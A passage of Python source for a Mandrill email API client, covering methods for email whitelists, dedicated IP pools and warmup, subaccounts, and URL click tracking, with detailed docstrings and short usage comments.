_params = {'email': email}
return self.master.call('whitelists/add', _params)
def list(self, email=None):
"""Retrieves your email rejection whitelist. You can provide an email
address or search prefix to limit the results. Returns up to 1000 results.
Args:
email (string): an optional email address or prefix to search by
Returns:
array. up to 1000 whitelist entries::
[] (struct): the information for each whitelist entry::
[].email (string): the email that is whitelisted
[].detail (string): a description of why the email was whitelisted
[].created_at (string): when the email was added to the whitelist
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {'email': email}
return self.master.call('whitelists/list', _params)
def delete(self, email):
"""Removes an email address from the whitelist.
Args:
email (string): the email address to remove from the whitelist
Returns:
struct. a status object containing the address and whether the deletion succeeded::
email (string): the email address that was removed from the whitelist
deleted (boolean): whether the address was deleted successfully
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {'email': email}
return self.master.call('whitelists/delete', _params)
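# A minimal whitelist lifecycle sketch (hypothetical address; assumes the
# handler is exposed as `client.whitelists`):
#
#   client.whitelists.add('vip@example.com')
#   entries = client.whitelists.list(email='vip@')   # prefix search
#   client.whitelists.delete('vip@example.com')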
class Ips(object):
def __init__(self, master):
self.master = master
def list(self):
"""Lists your dedicated IPs.
Returns:
array. an array of structs for each dedicated IP::
[] (struct): information about a single dedicated IP::
[].ip (string): the ip address
[].created_at (string): the date and time that the dedicated IP was created as a UTC string in YYYY-MM-DD HH:MM:SS format
[].pool (string): the name of the pool that this dedicated IP belongs to
[].domain (string): the domain name (reverse dns) of this dedicated IP
[].custom_dns (struct): information about the ip's custom dns, if it has been configured::
[].custom_dns.enabled (boolean): a boolean indicating whether custom dns has been configured for this ip
[].custom_dns.valid (boolean): whether the ip's custom dns is currently valid
[].custom_dns.error (string): if the ip's custom dns is invalid, this will include details about the error
[].warmup (struct): information about the ip's warmup status::
[].warmup.warming_up (boolean): whether the ip is currently in warmup mode
[].warmup.start_at (string): the start time for the warmup process as a UTC string in YYYY-MM-DD HH:MM:SS format
[].warmup.end_at (string): the end date and time for the warmup process as a UTC string in YYYY-MM-DD HH:MM:SS format
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {}
return self.master.call('ips/list', _params)
def info(self, ip):
"""Retrieves information about a single dedicated ip.
Args:
ip (string): a dedicated IP address
Returns:
struct. Information about the dedicated ip::
ip (string): the ip address
created_at (string): the date and time that the dedicated IP was created as a UTC string in YYYY-MM-DD HH:MM:SS format
pool (string): the name of the pool that this dedicated IP belongs to
domain (string): the domain name (reverse dns) of this dedicated IP
custom_dns (struct): information about the ip's custom dns, if it has been configured::
custom_dns.enabled (boolean): a boolean indicating whether custom dns has been configured for this ip
custom_dns.valid (boolean): whether the ip's custom dns is currently valid
custom_dns.error (string): if the ip's custom dns is invalid, this will include details about the error
warmup (struct): information about the ip's warmup status::
warmup.warming_up (boolean): whether the ip is currently in warmup mode
warmup.start_at (string): the start time for the warmup process as a UTC string in YYYY-MM-DD HH:MM:SS format
warmup.end_at (string): the end date and time for the warmup process as a UTC string in YYYY-MM-DD HH:MM:SS format
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {'ip': ip}
return self.master.call('ips/info', _params)
def provision(self, warmup=False, pool=None):
"""Requests an additional dedicated IP for your account. Accounts may
have one outstanding request at any time, and provisioning requests
are processed within 24 hours.
Args:
warmup (boolean): whether to enable warmup mode for the ip
pool (string): the id of the pool to add the dedicated ip to, or null to use your account's default pool
Returns:
struct. a description of the provisioning request that was created::
requested_at (string): the date and time that the request was created as a UTC timestamp in YYYY-MM-DD HH:MM:SS format
Raises:
IPProvisionLimitError: A dedicated IP cannot be provisioned while another request is pending.
UnknownPoolError: The provided dedicated IP pool does not exist.
PaymentRequiredError: The requested feature requires payment.
InvalidKeyError: The provided API key is not a valid Mandrill API key
NoSendingHistoryError: The user hasn't started sending yet.
PoorReputationError: The user's reputation is too low to continue.
Error: A general Mandrill error has occurred
"""
_params = {'warmup': warmup, 'pool': pool}
return self.master.call('ips/provision', _params)
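# A hedged provisioning sketch (hypothetical pool name; assumes `client.ips`).
# Per the docstring above, the request is queued rather than fulfilled
# immediately:
#
#   request = client.ips.provision(warmup=True, pool='transactional')
#   print(request['requested_at'])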
def start_warmup(self, ip):
"""Begins the warmup process for a dedicated IP. During the warmup process,
Mandrill will gradually increase the percentage of your mail that is sent over
the warming-up IP, over a period of roughly 30 days. The rest of your mail
will be sent over shared IPs or other dedicated IPs in the same pool.
Args:
ip (string): a dedicated ip address
Returns:
struct. Information about the dedicated IP::
ip (string): the ip address
created_at (string): the date and time that the dedicated IP was created as a UTC string in YYYY-MM-DD HH:MM:SS format
pool (string): the name of the pool that this dedicated IP belongs to
domain (string): the domain name (reverse dns) of this dedicated IP
custom_dns (struct): information about the ip's custom dns, if it has been configured::
custom_dns.enabled (boolean): a boolean indicating whether custom dns has been configured for this ip
custom_dns.valid (boolean): whether the ip's custom dns is currently valid
custom_dns.error (string): if the ip's custom dns is invalid, this will include details about the error
warmup (struct): information about the ip's warmup status::
warmup.warming_up (boolean): whether the ip is currently in warmup mode
warmup.start_at (string): the start time for the warmup process as a UTC string in YYYY-MM-DD HH:MM:SS format
warmup.end_at (string): the end date and time for the warmup process as a UTC string in YYYY-MM-DD HH:MM:SS format
Raises:
UnknownIPError: The provided dedicated IP does not exist.
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {'ip': ip}
return self.master.call('ips/start-warmup', _params)
def cancel_warmup(self, ip):
"""Cancels the warmup process for a dedicated IP.
Args:
ip (string): a dedicated ip address
Returns:
struct. Information about the dedicated IP::
ip (string): the ip address
created_at (string): the date and time that the dedicated IP was created as a UTC string in YYYY-MM-DD HH:MM:SS format
pool (string): the name of the pool that this dedicated IP belongs to
domain (string): the domain name (reverse dns) of this dedicated IP
custom_dns (struct): information about the ip's custom dns, if it has been configured::
custom_dns.enabled (boolean): a boolean indicating whether custom dns has been configured for this ip
custom_dns.valid (boolean): whether the ip's custom dns is currently valid
custom_dns.error (string): if the ip's custom dns is invalid, this will include details about the error
warmup (struct): information about the ip's warmup status::
warmup.warming_up (boolean): whether the ip is currently in warmup mode
warmup.start_at (string): the start time for the warmup process as a UTC string in YYYY-MM-DD HH:MM:SS format
warmup.end_at (string): the end date and time for the warmup process as a UTC string in YYYY-MM-DD HH:MM:SS format
Raises:
UnknownIPError: The provided dedicated IP does not exist.
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {'ip': ip}
return self.master.call('ips/cancel-warmup', _params)
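# A warmup sketch (hypothetical documentation IP; start the roughly 30-day
# warmup, inspect its status, then cancel it):
#
#   info = client.ips.start_warmup('192.0.2.10')
#   print(info['warmup']['warming_up'])   # True while warming up
#   client.ips.cancel_warmup('192.0.2.10')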
def set_pool(self, ip, pool, create_pool=False):
"""Moves a dedicated IP to a different pool.
Args:
ip (string): a dedicated ip address
pool (string): the name of the new pool to add the dedicated ip to
create_pool (boolean): whether to create the pool if it does not exist; if false and the pool does not exist, an UnknownPoolError will be raised.
Returns:
struct. Information about the updated state of the dedicated IP::
ip (string): the ip address
created_at (string): the date and time that the dedicated IP was created as a UTC string in YYYY-MM-DD HH:MM:SS format
pool (string): the name of the pool that this dedicated IP belongs to
domain (string): the domain name (reverse dns) of this dedicated IP
custom_dns (struct): information about the ip's custom dns, if it has been configured::
custom_dns.enabled (boolean): a boolean indicating whether custom dns has been configured for this ip
custom_dns.valid (boolean): whether the ip's custom dns is currently valid
custom_dns.error (string): if the ip's custom dns is invalid, this will include details about the error
warmup (struct): information about the ip's warmup status::
warmup.warming_up (boolean): whether the ip is currently in warmup mode
warmup.start_at (string): the start time for the warmup process as a UTC string in YYYY-MM-DD HH:MM:SS format
warmup.end_at (string): the end date and time for the warmup process as a UTC string in YYYY-MM-DD HH:MM:SS format
Raises:
UnknownIPError: The provided dedicated IP does not exist.
UnknownPoolError: The provided dedicated IP pool does not exist.
InvalidKeyError: The provided API key is not a valid Mandrill API key
InvalidEmptyDefaultPoolError: You cannot remove the last IP from your default IP pool.
Error: A general Mandrill error has occurred
"""
_params = {'ip': ip, 'pool': pool, 'create_pool': create_pool}
return self.master.call('ips/set-pool', _params)
def delete(self, ip):
"""Deletes a dedicated IP. This is permanent and cannot be undone.
Args:
ip (string): the dedicated ip to remove from your account
Returns:
struct. a description of the ip that was removed from your account.::
ip (string): the ip address
deleted (boolean): whether the ip was successfully deleted
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {'ip': ip}
return self.master.call('ips/delete', _params)
def list_pools(self):
"""Lists your dedicated IP pools.
Returns:
array. the dedicated IP pools for your account, up to a maximum of 1,000::
[] (struct): information about each dedicated IP pool::
[].name (string): this pool's name
[].created_at (string): the date and time that this pool was created as a UTC timestamp in YYYY-MM-DD HH:MM:SS format
[].ips (array): the dedicated IPs in this pool::
[].ips[] (struct): information about each dedicated IP::
[].ips[].ip (string): the ip address
[].ips[].created_at (string): the date and time that the dedicated IP was created as a UTC string in YYYY-MM-DD HH:MM:SS format
[].ips[].pool (string): the name of the pool that this dedicated IP belongs to
[].ips[].domain (string): the domain name (reverse dns) of this dedicated IP
[].ips[].custom_dns (struct): information about the ip's custom dns, if it has been configured::
[].ips[].custom_dns.enabled (boolean): a boolean indicating whether custom dns has been configured for this ip
[].ips[].custom_dns.valid (boolean): whether the ip's custom dns is currently valid
[].ips[].custom_dns.error (string): if the ip's custom dns is invalid, this will include details about the error
[].ips[].warmup (struct): information about the ip's warmup status::
[].ips[].warmup.warming_up (boolean): whether the ip is currently in warmup mode
[].ips[].warmup.start_at (string): the start time for the warmup process as a UTC string in YYYY-MM-DD HH:MM:SS format
[].ips[].warmup.end_at (string): the end date and time for the warmup process as a UTC string in YYYY-MM-DD HH:MM:SS format
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {}
return self.master.call('ips/list-pools', _params)
def pool_info(self, pool):
"""Describes a single dedicated IP pool.
Args:
pool (string): a pool name
Returns:
struct. Information about the dedicated ip pool::
name (string): this pool's name
created_at (string): the date and time that this pool was created as a UTC timestamp in YYYY-MM-DD HH:MM:SS format
ips (array): the dedicated IPs in this pool::
ips[] (struct): information about each dedicated IP::
ips[].ip (string): the ip address
ips[].created_at (string): the date and time that the dedicated IP was created as a UTC string in YYYY-MM-DD HH:MM:SS format
ips[].pool (string): the name of the pool that this dedicated IP belongs to
ips[].domain (string): the domain name (reverse dns) of this dedicated IP
ips[].custom_dns (struct): information about the ip's custom dns, if it has been configured::
ips[].custom_dns.enabled (boolean): a boolean indicating whether custom dns has been configured for this ip
ips[].custom_dns.valid (boolean): whether the ip's custom dns is currently valid
ips[].custom_dns.error (string): if the ip's custom dns is invalid, this will include details about the error
ips[].warmup (struct): information about the ip's warmup status::
ips[].warmup.warming_up (boolean): whether the ip is currently in warmup mode
ips[].warmup.start_at (string): the start time for the warmup process as a UTC string in YYYY-MM-DD HH:MM:SS format
ips[].warmup.end_at (string): the end date and time for the warmup process as a UTC string in YYYY-MM-DD HH:MM:SS format
Raises:
UnknownPoolError: The provided dedicated IP pool does not exist.
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {'pool': pool}
return self.master.call('ips/pool-info', _params)
def create_pool(self, pool):
"""Creates a pool and returns it. If a pool already exists with this
name, no action will be performed.
Args:
pool (string): the name of a pool to create
Returns:
struct. Information about the dedicated ip pool::
name (string): this pool's name
created_at (string): the date and time that this pool was created as a UTC timestamp in YYYY-MM-DD HH:MM:SS format
ips (array): the dedicated IPs in this pool::
ips[] (struct): information about each dedicated IP::
ips[].ip (string): the ip address
ips[].created_at (string): the date and time that the dedicated IP was created as a UTC string in YYYY-MM-DD HH:MM:SS format
ips[].pool (string): the name of the pool that this dedicated IP belongs to
ips[].domain (string): the domain name (reverse dns) of this dedicated IP
ips[].custom_dns (struct): information about the ip's custom dns, if it has been configured::
ips[].custom_dns.enabled (boolean): a boolean indicating whether custom dns has been configured for this ip
ips[].custom_dns.valid (boolean): whether the ip's custom dns is currently valid
ips[].custom_dns.error (string): if the ip's custom dns is invalid, this will include details about the error
ips[].warmup (struct): information about the ip's warmup status::
ips[].warmup.warming_up (boolean): whether the ip is currently in warmup mode
ips[].warmup.start_at (string): the start time for the warmup process as a UTC string in YYYY-MM-DD HH:MM:SS format
ips[].warmup.end_at (string): the end date and time for the warmup process as a UTC string in YYYY-MM-DD HH:MM:SS format
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {'pool': pool}
return self.master.call('ips/create-pool', _params)
def delete_pool(self, pool):
"""Deletes a pool. A pool must be empty before you can delete it, and you cannot delete your default pool.
Args:
pool (string): the name of the pool to delete
Returns:
struct. information about the status of the pool that was deleted::
pool (string): the name of the pool
deleted (boolean): whether the pool was deleted
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
UnknownPoolError: The provided dedicated IP pool does not exist.
InvalidDeleteDefaultPoolError: The default pool cannot be deleted.
InvalidDeleteNonEmptyPoolError: Non-empty pools cannot be deleted.
Error: A general Mandrill error has occurred
"""
_params = {'pool': pool}
return self.master.call('ips/delete-pool', _params)
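# A pool-management sketch (hypothetical names and IP; 'default' below is a
# hypothetical default-pool name): create a pool, move an IP into it, inspect
# it, then empty and delete it, since non-empty pools cannot be deleted.
#
#   client.ips.create_pool('marketing')
#   client.ips.set_pool('192.0.2.10', 'marketing')
#   pool = client.ips.pool_info('marketing')
#   print(len(pool['ips']))
#   client.ips.set_pool('192.0.2.10', 'default')
#   client.ips.delete_pool('marketing')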
def check_custom_dns(self, ip, domain):
"""Tests whether a domain name is valid for use as the custom reverse
DNS for a dedicated IP.
Args:
ip (string): a dedicated ip address
domain (string): the domain name to test
Returns:
struct. validation results for the domain::
valid (boolean): whether the domain name has a correctly-configured A record pointing to the ip address
error (string): if valid is false, this will contain details about why the domain's A record is incorrect
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
UnknownIPError: The provided dedicated IP does not exist.
Error: A general Mandrill error has occurred
"""
_params = {'ip': ip, 'domain': domain}
return self.master.call('ips/check-custom-dns', _params)
def set_custom_dns(self, ip, domain):
"""Configures the custom DNS name for a dedicated IP.
Args:
ip (string): a dedicated ip address
domain (string): a domain name to set as the dedicated IP's custom dns name.
Returns:
struct. information about the dedicated IP's new configuration::
ip (string): the ip address
created_at (string): the date and time that the dedicated IP was created as a UTC string in YYYY-MM-DD HH:MM:SS format
pool (string): the name of the pool that this dedicated IP belongs to
domain (string): the domain name (reverse dns) of this dedicated IP
custom_dns (struct): information about the ip's custom dns, if it has been configured::
custom_dns.enabled (boolean): a boolean indicating whether custom dns has been configured for this ip
custom_dns.valid (boolean): whether the ip's custom dns is currently valid
custom_dns.error (string): if the ip's custom dns is invalid, this will include details about the error
warmup (struct): information about the ip's warmup status::
warmup.warming_up (boolean): whether the ip is currently in warmup mode
warmup.start_at (string): the start time for the warmup process as a UTC string in YYYY-MM-DD HH:MM:SS format
warmup.end_at (string): the end date and time for the warmup process as a UTC string in YYYY-MM-DD HH:MM:SS format
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
UnknownIPError: The provided dedicated IP does not exist.
InvalidCustomDNSError: The domain name is not configured for use as the dedicated IP's custom reverse DNS.
InvalidCustomDNSPendingError: A custom DNS change for this dedicated IP is currently pending.
Error: A general Mandrill error has occurred
"""
_params = {'ip': ip, 'domain': domain}
return self.master.call('ips/set-custom-dns', _params)
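# A custom-DNS sketch (hypothetical IP and domain; validate the A record
# before committing to it):
#
#   check = client.ips.check_custom_dns('192.0.2.10', 'mail.example.com')
#   if check['valid']:
#       client.ips.set_custom_dns('192.0.2.10', 'mail.example.com')
#   else:
#       print(check['error'])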
class Internal(object):
def __init__(self, master):
self.master = master
class Subaccounts(object):
def __init__(self, master):
self.master = master
def list(self, q=None):
"""Get the list of subaccounts defined for the account, optionally filtered by a prefix
Args:
q (string): an optional prefix to filter the subaccounts' ids and names
Returns:
array. the subaccounts for the account, up to a maximum of 1,000::
[] (struct): the individual subaccount info::
[].id (string): a unique identifier for the subaccount
[].name (string): an optional display name for the subaccount
[].custom_quota (integer): an optional manual hourly quota for the subaccount. If not specified, the hourly quota will be managed based on reputation
[].status (string): the current sending status of the subaccount, one of "active" or "paused"
[].reputation (integer): the subaccount's current reputation on a scale from 0 to 100
[].created_at (string): the date and time that the subaccount was created as a UTC string in YYYY-MM-DD HH:MM:SS format
[].first_sent_at (string): the date and time that the subaccount first sent as a UTC string in YYYY-MM-DD HH:MM:SS format
[].sent_weekly (integer): the number of emails the subaccount has sent so far this week (weeks start on midnight Monday, UTC)
[].sent_monthly (integer): the number of emails the subaccount has sent so far this month (months start on midnight of the 1st, UTC)
[].sent_total (integer): the number of emails the subaccount has sent since it was created
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {'q': q}
return self.master.call('subaccounts/list', _params)
def add(self, id, name=None, notes=None, custom_quota=None):
"""Add a new subaccount
Args:
id (string): a unique identifier for the subaccount to be used in sending calls
name (string): an optional display name to further identify the subaccount
notes (string): optional extra text to associate with the subaccount
custom_quota (integer): an optional manual hourly quota for the subaccount. If not specified, Mandrill will manage this based on reputation
Returns:
struct. the information saved about the new subaccount::
id (string): a unique identifier for the subaccount
name (string): an optional display name for the subaccount
custom_quota (integer): an optional manual hourly quota for the subaccount. If not specified, the hourly quota will be managed based on reputation
status (string): the current sending status of the subaccount, one of "active" or "paused"
reputation (integer): the subaccount's current reputation on a scale from 0 to 100
created_at (string): the date and time that the subaccount was created as a UTC string in YYYY-MM-DD HH:MM:SS format
first_sent_at (string): the date and time that the subaccount first sent as a UTC string in YYYY-MM-DD HH:MM:SS format
sent_weekly (integer): the number of emails the subaccount has sent so far this week (weeks start on midnight Monday, UTC)
sent_monthly (integer): the number of emails the subaccount has sent so far this month (months start on midnight of the 1st, UTC)
sent_total (integer): the number of emails the subaccount has sent since it was created
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {'id': id, 'name': name, 'notes': notes, 'custom_quota': custom_quota}
return self.master.call('subaccounts/add', _params)
def info(self, id):
"""Given the ID of an existing subaccount, return the data about it
Args:
id (string): the unique identifier of the subaccount to query
Returns:
struct. the information about the subaccount::
id (string): a unique identifier for the subaccount
name (string): an optional display name for the subaccount
notes (string): optional extra text to associate with the subaccount
custom_quota (integer): an optional manual hourly quota for the subaccount. If not specified, the hourly quota will be managed based on reputation
status (string): the current sending status of the subaccount, one of "active" or "paused"
reputation (integer): the subaccount's current reputation on a scale from 0 to 100
created_at (string): the date and time that the subaccount was created as a UTC string in YYYY-MM-DD HH:MM:SS format
first_sent_at (string): the date and time that the subaccount first sent as a UTC string in YYYY-MM-DD HH:MM:SS format
sent_weekly (integer): the number of emails the subaccount has sent so far this week (weeks start on midnight Monday, UTC)
sent_monthly (integer): the number of emails the subaccount has sent so far this month (months start on midnight of the 1st, UTC)
sent_total (integer): the number of emails the subaccount has sent since it was created
sent_hourly (integer): the number of emails the subaccount has sent in the last hour
hourly_quota (integer): the current hourly quota for the subaccount, either manual or reputation-based
last_30_days (struct): stats for this subaccount in the last 30 days::
last_30_days.sent (integer): the number of emails sent for this subaccount in the last 30 days
last_30_days.hard_bounces (integer): the number of emails hard bounced for this subaccount in the last 30 days
last_30_days.soft_bounces (integer): the number of emails soft bounced for this subaccount in the last 30 days
last_30_days.rejects (integer): the number of emails rejected for sending this subaccount in the last 30 days
last_30_days.complaints (integer): the number of spam complaints for this subaccount in the last 30 days
last_30_days.unsubs (integer): the number of unsubscribes for this subaccount in the last 30 days
last_30_days.opens (integer): the number of times emails have been opened for this subaccount in the last 30 days
last_30_days.unique_opens (integer): the number of unique opens for emails sent for this subaccount in the last 30 days
last_30_days.clicks (integer): the number of URLs that have been clicked for this subaccount in the last 30 days
last_30_days.unique_clicks (integer): the number of unique clicks for emails sent for this subaccount in the last 30 days
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
UnknownSubaccountError: The provided subaccount id does not exist.
Error: A general Mandrill error has occurred
"""
_params = {'id': id}
return self.master.call('subaccounts/info', _params)
def update(self, id, name=None, notes=None, custom_quota=None):
"""Update an existing subaccount
Args:
id (string): the unique identifier of the subaccount to update
name (string): an optional display name to further identify the subaccount
notes (string): optional extra text to associate with the subaccount
custom_quota (integer): an optional manual hourly quota for the subaccount. If not specified, Mandrill will manage this based on reputation
Returns:
struct. the information for the updated subaccount::
id (string): a unique identifier for the subaccount
name (string): an optional display name for the subaccount
custom_quota (integer): an optional manual hourly quota for the subaccount. If not specified, the hourly quota will be managed based on reputation
status (string): the current sending status of the subaccount, one of "active" or "paused"
reputation (integer): the subaccount's current reputation on a scale from 0 to 100
created_at (string): the date and time that the subaccount was created as a UTC string in YYYY-MM-DD HH:MM:SS format
first_sent_at (string): the date and time that the subaccount first sent as a UTC string in YYYY-MM-DD HH:MM:SS format
sent_weekly (integer): the number of emails the subaccount has sent so far this week (weeks start on midnight Monday, UTC)
sent_monthly (integer): the number of emails the subaccount has sent so far this month (months start on midnight of the 1st, UTC)
sent_total (integer): the number of emails the subaccount has sent since it was created
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
UnknownSubaccountError: The provided subaccount id does not exist.
Error: A general Mandrill error has occurred
"""
_params = {'id': id, 'name': name, 'notes': notes, 'custom_quota': custom_quota}
return self.master.call('subaccounts/update', _params)
def delete(self, id):
"""Delete an existing subaccount. Any email related to the subaccount will be saved, but stats will be removed and any future sending calls to this subaccount will fail.
Args:
id (string): the unique identifier of the subaccount to delete
Returns:
struct. the information for the deleted subaccount::
id (string): a unique identifier for the subaccount
name (string): an optional display name for the subaccount
custom_quota (integer): an optional manual hourly quota for the subaccount. If not specified, the hourly quota will be managed based on reputation
status (string): the current sending status of the subaccount, one of "active" or "paused"
reputation (integer): the subaccount's current reputation on a scale from 0 to 100
created_at (string): the date and time that the subaccount was created as a UTC string in YYYY-MM-DD HH:MM:SS format
first_sent_at (string): the date and time that the subaccount first sent as a UTC string in YYYY-MM-DD HH:MM:SS format
sent_weekly (integer): the number of emails the subaccount has sent so far this week (weeks start on midnight Monday, UTC)
sent_monthly (integer): the number of emails the subaccount has sent so far this month (months start on midnight of the 1st, UTC)
sent_total (integer): the number of emails the subaccount has sent since it was created
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
UnknownSubaccountError: The provided subaccount id does not exist.
Error: A general Mandrill error has occurred
"""
_params = {'id': id}
return self.master.call('subaccounts/delete', _params)
def pause(self, id):
"""Pause a subaccount's sending. Any future emails delivered to this subaccount will be queued for a maximum of 3 days until the subaccount is resumed.
Args:
id (string): the unique identifier of the subaccount to pause
Returns:
struct. the information for the paused subaccount::
id (string): a unique identifier for the subaccount
name (string): an optional display name for the subaccount
custom_quota (integer): an optional manual hourly quota for the subaccount. If not specified, the hourly quota will be managed based on reputation
status (string): the current sending status of the subaccount, one of "active" or "paused"
reputation (integer): the subaccount's current reputation on a scale from 0 to 100
created_at (string): the date and time that the subaccount was created as a UTC string in YYYY-MM-DD HH:MM:SS format
first_sent_at (string): the date and time that the subaccount first sent as a UTC string in YYYY-MM-DD HH:MM:SS format
sent_weekly (integer): the number of emails the subaccount has sent so far this week (weeks start on midnight Monday, UTC)
sent_monthly (integer): the number of emails the subaccount has sent so far this month (months start on midnight of the 1st, UTC)
sent_total (integer): the number of emails the subaccount has sent since it was created
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
UnknownSubaccountError: The provided subaccount id does not exist.
Error: A general Mandrill error has occurred
"""
_params = {'id': id}
return self.master.call('subaccounts/pause', _params)
def resume(self, id):
"""Resume a paused subaccount's sending
Args:
id (string): the unique identifier of the subaccount to resume
Returns:
struct. the information for the resumed subaccount::
id (string): a unique identifier for the subaccount
name (string): an optional display name for the subaccount
custom_quota (integer): an optional manual hourly quota for the subaccount. If not specified, the hourly quota will be managed based on reputation
status (string): the current sending status of the subaccount, one of "active" or "paused"
reputation (integer): the subaccount's current reputation on a scale from 0 to 100
created_at (string): the date and time that the subaccount was created as a UTC string in YYYY-MM-DD HH:MM:SS format
first_sent_at (string): the date and time that the subaccount first sent as a UTC string in YYYY-MM-DD HH:MM:SS format
sent_weekly (integer): the number of emails the subaccount has sent so far this week (weeks start on midnight Monday, UTC)
sent_monthly (integer): the number of emails the subaccount has sent so far this month (months start on midnight of the 1st, UTC)
sent_total (integer): the number of emails the subaccount has sent since it was created
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
UnknownSubaccountError: The provided subaccount id does not exist.
Error: A general Mandrill error has occurred
"""
_params = {'id': id}
return self.master.call('subaccounts/resume', _params)
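# A subaccount lifecycle sketch (hypothetical id and quota; assumes the
# handler is exposed as `client.subaccounts`):
#
#   client.subaccounts.add('cust-42', name='Customer 42', custom_quota=100)
#   info = client.subaccounts.info('cust-42')
#   print(info['status'])          # 'active'
#   client.subaccounts.pause('cust-42')
#   client.subaccounts.resume('cust-42')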
class Urls(object):
def __init__(self, master):
self.master = master
def list(self):
"""Get the 100 most clicked URLs
Returns:
array. the 100 most clicked URLs and their stats::
[] (struct): the individual URL stats::
[].url (string): the URL to be tracked
[].sent (integer): the number of emails that contained the URL
[].clicks (integer): the number of times the URL has been clicked from a tracked email
[].unique_clicks (integer): the number of unique emails that have generated clicks for this URL
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {}
return self.master.call('urls/list', _params)
def search(self, q):
"""Return the 100 most clicked URLs that match the search query given
Args:
q (string): a search query
Returns:
array. the 100 most clicked URLs matching the search query::
[] (struct): the URL matching the query::
[].url (string): the URL to be tracked
[].sent (integer): the number of emails that contained the URL
[].clicks (integer): the number of times the URL has been clicked from a tracked email
[].unique_clicks (integer): the number of unique emails that have generated clicks for this URL
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {'q': q}
return self.master.call('urls/search', _params)
def time_series(self, url):
"""Return the recent history (hourly stats for the last 30 days) for a url
Args:
url (string): an existing URL
Returns:
array. the array of history information::
[] (struct): the information for a single hour::
[].time (string): the hour as a UTC date string in YYYY-MM-DD HH:MM:SS format
[].sent (integer): the number of emails that were sent with the URL during the hour
[].clicks (integer): the number of times the URL was clicked during the hour
[].unique_clicks (integer): the number of unique clicks generated for emails sent with this URL during the hour
Raises:
UnknownUrlError: The requested URL has not been seen in a tracked link
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {'url': url}
return self.master.call('urls/time-series', _params)
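# A URL-stats sketch (hypothetical query and URL; assumes `client.urls`):
#
#   for entry in client.urls.search('example.com'):
#       print(entry['url'] + ': ' + str(entry['clicks']))
#   history = client.urls.time_series('http://example.com/landing')
#   print(len(history))   # hourly buckets covering up to the last 30 days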
def tracking_domains(self):
"""Get the list of tracking domains set up for this account
Returns:
array. the tracking domains and their status::
[] (struct): the individual tracking domain::
[].domain (string): the tracking domain name
[].created_at (string): the date and time that the tracking domain was added as a UTC string in YYYY-MM-DD HH:MM:SS format
[].last_tested_at (string): when the domain's DNS settings were last tested as a UTC string in YYYY-MM-DD HH:MM:SS format
[].cname (struct): details about the domain's CNAME record::
[].cname.valid (boolean): whether the domain's CNAME record is valid for use with Mandrill
[].cname.valid_after (string): when the domain's CNAME record will be considered valid for use with Mandrill as a UTC string in YYYY-MM-DD HH:MM:SS format. If set, this indicates that the record is valid now, but was previously invalid, and Mandrill will wait until the record's TTL elapses to start using it.
[].cname.error (string): an error describing the CNAME record, or null if the record is correct
[].valid_tracking (boolean): whether this domain can be used as a tracking domain for email.
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {}
return self.master.call('urls/tracking-domains', _params)
def add_tracking_domain(self, domain):
"""Add a tracking domain to your account
Args:
domain (string): a domain name
Returns:
struct. information about the domain::
domain (string): the tracking domain name
created_at (string): the date and time that the tracking domain was added as a UTC string in YYYY-MM-DD HH:MM:SS format
last_tested_at (string): when the domain's DNS settings were last tested as a UTC string in YYYY-MM-DD HH:MM:SS format
cname (struct): details about the domain's CNAME record::
cname.valid (boolean): whether the domain's CNAME record is valid for use with Mandrill
cname.valid_after (string): when the domain's CNAME record will be considered valid for use with Mandrill as a UTC string in YYYY-MM-DD HH:MM:SS format. If set, this indicates that the record is valid now, but was previously invalid, and Mandrill will wait until the record's TTL elapses to start using it.
cname.error (string): an error describing the CNAME record, or null if the record is correct
valid_tracking (boolean): whether this domain can be used as a tracking domain for email.
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {'domain': domain}
return self.master.call('urls/add-tracking-domain', _params)
def check_tracking_domain(self, domain):
"""Checks the CNAME settings for a tracking domain. The domain must have been added already with the add-tracking-domain call
Args:
domain (string): an existing tracking domain name
Returns:
struct. information about the tracking domain::
domain (string): the tracking domain name
created_at (string): the date and time that the tracking domain was added as a UTC string in YYYY-MM-DD HH:MM:SS format
last_tested_at (string): when the domain's DNS settings were last tested as a UTC string in YYYY-MM-DD HH:MM:SS format
cname (struct): details about the domain's CNAME record::
cname.valid (boolean): whether the domain's CNAME record is valid for use with Mandrill
